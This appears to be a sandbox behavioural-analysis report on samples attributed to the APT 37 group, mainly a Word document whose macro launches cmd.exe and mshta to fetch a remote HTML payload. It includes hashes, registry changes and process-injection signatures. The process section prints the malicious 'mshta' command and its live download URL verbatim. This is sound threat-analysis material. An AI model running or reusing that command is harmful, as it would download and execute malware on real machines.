Overview
overview
10Static
static
8APT 37 Pre...˜¸.rar
windows7-x64
3APT 37 Pre...˜¸.rar
windows10-2004-x64
3KN0408_045...˜¸.chm
windows7-x64
1KN0408_045...˜¸.chm
windows10-2004-x64
1KN0408_045...호.js
windows7-x64
1KN0408_045...호.js
windows10-2004-x64
1APT 37 Pre...„ .rar
windows7-x64
3APT 37 Pre...„ .rar
windows10-2004-x64
3LGìœ í”ŒëŸ...„ .chm
windows7-x64
1LGìœ í”ŒëŸ...„ .chm
windows10-2004-x64
1LGìœ í”ŒëŸ... .html
windows7-x64
1LGìœ í”ŒëŸ... .html
windows10-2004-x64
1APT 37 Pre...„ .rar
windows7-x64
3APT 37 Pre...„ .rar
windows10-2004-x64
3APT 37 Pre...02.rar
windows7-x64
3APT 37 Pre...02.rar
windows10-2004-x64
3APT 37 Pre...1).rar
windows7-x64
3APT 37 Pre...1).rar
windows10-2004-x64
3APT 37 Pre...ge.rar
windows7-x64
3APT 37 Pre...ge.rar
windows10-2004-x64
3APT 37 Pre...¦.doc
windows7-x64
10APT 37 Pre...¦.doc
windows10-2004-x64
10APT 37 Pre...1).rar
windows7-x64
3APT 37 Pre...1).rar
windows10-2004-x64
3APT 37 Pre...2).rar
windows7-x64
3APT 37 Pre...2).rar
windows10-2004-x64
3APT 37 Pre...ce.rar
windows7-x64
3APT 37 Pre...ce.rar
windows10-2004-x64
3APT 37 Pre...1).rar
windows7-x64
3APT 37 Pre...1).rar
windows10-2004-x64
3APT 37 Pre...ne.rar
windows7-x64
3APT 37 Pre...ne.rar
windows10-2004-x64
3Analysis
-
max time kernel
145s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
21-03-2023 23:28
Behavioral task
behavioral1
Sample
APT 37 Previous Commits 3/KN0408_045 ì •ì˜í˜¸.rar
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
APT 37 Previous Commits 3/KN0408_045 ì •ì˜í˜¸.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
KN0408_045 ì •ì˜í˜¸/KN0408_045 ì •ì˜í˜¸.chm
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
KN0408_045 ì •ì˜í˜¸/KN0408_045 ì •ì˜í˜¸.chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
KN0408_045 ì •ì˜í˜¸/KN0408_045 ì •ì˜í˜¸.js
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
KN0408_045 ì •ì˜í˜¸/KN0408_045 ì •ì˜í˜¸.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
APT 37 Previous Commits 3/LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .rar
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
APT 37 Previous Commits 3/LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .chm
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral11
Sample
LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .html
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .html
Resource
win10v2004-20230221-en
Behavioral task
behavioral13
Sample
APT 37 Previous Commits 3/LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202208_ì´_ì„ .rar
Resource
win7-20230220-en
Behavioral task
behavioral14
Sample
APT 37 Previous Commits 3/LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202208_ì´_ì„ .rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral15
Sample
APT 37 Previous Commits 3/MAIL_20230125151802.rar
Resource
win7-20230220-en
Behavioral task
behavioral16
Sample
APT 37 Previous Commits 3/MAIL_20230125151802.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral17
Sample
APT 37 Previous Commits 3/Message (1).rar
Resource
win7-20230220-en
Behavioral task
behavioral18
Sample
APT 37 Previous Commits 3/Message (1).rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral19
Sample
APT 37 Previous Commits 3/Message.rar
Resource
win7-20230220-en
Behavioral task
behavioral20
Sample
APT 37 Previous Commits 3/Message.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral21
Sample
APT 37 Previous Commits 3/NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc
Resource
win7-20230220-en
Behavioral task
behavioral22
Sample
APT 37 Previous Commits 3/NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc
Resource
win10v2004-20230220-en
Behavioral task
behavioral23
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice (1).rar
Resource
win7-20230220-en
Behavioral task
behavioral24
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice (1).rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral25
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice (2).rar
Resource
win7-20230220-en
Behavioral task
behavioral26
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice (2).rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral27
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice.rar
Resource
win7-20230220-en
Behavioral task
behavioral28
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral29
Sample
APT 37 Previous Commits 3/News about Foreign affairs, The High North and Ukraine (1).rar
Resource
win7-20230220-en
Behavioral task
behavioral30
Sample
APT 37 Previous Commits 3/News about Foreign affairs, The High North and Ukraine (1).rar
Resource
win10v2004-20230221-en
Behavioral task
behavioral31
Sample
APT 37 Previous Commits 3/News about Foreign affairs, The High North and Ukraine.rar
Resource
win7-20230220-en
Behavioral task
behavioral32
Sample
APT 37 Previous Commits 3/News about Foreign affairs, The High North and Ukraine.rar
Resource
win10v2004-20230220-en
General
-
Target
APT 37 Previous Commits 3/NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc
-
Size
768KB
-
MD5
e89725778e52fa571a229cc6e65acd8d
-
SHA1
11e14587aa9e4c3039a214b21d63a616a32aa01b
-
SHA256
0474bb7c100c5187c838e5cf14969fdaf04ed541e373aa3b1ad607dd2b420a1b
-
SHA512
cf070d7c2cd2f2006b55da592f4db8758ec94d3608d91bebef3ba958ac34bbabffa7dc2f17f52a77349ea922e6efbd22fddb74b6aaadd37593be2f28c3bcbb82
-
SSDEEP
12288:5eNs9H0fEccVGYEOH1uW7vyaQaHbB/g+1ev/6d6htoWHdttOOJVYqTz:YeRcBc1u6tHHbm/QUoW9XOO8
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/10.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 520 1960 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 4 360 mshta.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEmshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1960 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 1960 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1960 WINWORD.EXE 1960 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 1960 wrote to memory of 520 1960 WINWORD.EXE cmd.exe PID 1960 wrote to memory of 520 1960 WINWORD.EXE cmd.exe PID 1960 wrote to memory of 520 1960 WINWORD.EXE cmd.exe PID 1960 wrote to memory of 520 1960 WINWORD.EXE cmd.exe PID 520 wrote to memory of 360 520 cmd.exe mshta.exe PID 520 wrote to memory of 360 520 cmd.exe mshta.exe PID 520 wrote to memory of 360 520 cmd.exe mshta.exe PID 520 wrote to memory of 360 520 cmd.exe mshta.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\APT 37 Previous Commits 3\NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://attiferstudio.com/install.bak/sony/10.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta http://attiferstudio.com/install.bak/sony/10.html3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD57f4dbf31428f09fe93efabe50c88457f
SHA1ff6acb05aa2b88ffa157635e840a808914164462
SHA2565022a438a0209c4644f4251e80a6b898696f2badba18b9ca73468cf6fbd1fb80
SHA51257338624e9f70856d9051d46ceba4ea112c68c2c87cb77c56961782061aca43f08463fceda188a94449258bd3690b5f7463035852c8f128ea9e8da9e3f7d3f86
-
memory/1960-54-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1960-57-0x0000000000290000-0x0000000000390000-memory.dmpFilesize
1024KB
-
memory/1960-59-0x0000000000290000-0x0000000000390000-memory.dmpFilesize
1024KB
-
memory/1960-58-0x0000000000290000-0x0000000000390000-memory.dmpFilesize
1024KB
-
memory/1960-60-0x0000000000290000-0x0000000000390000-memory.dmpFilesize
1024KB
-
memory/1960-63-0x0000000000290000-0x0000000000390000-memory.dmpFilesize
1024KB
-
memory/1960-90-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB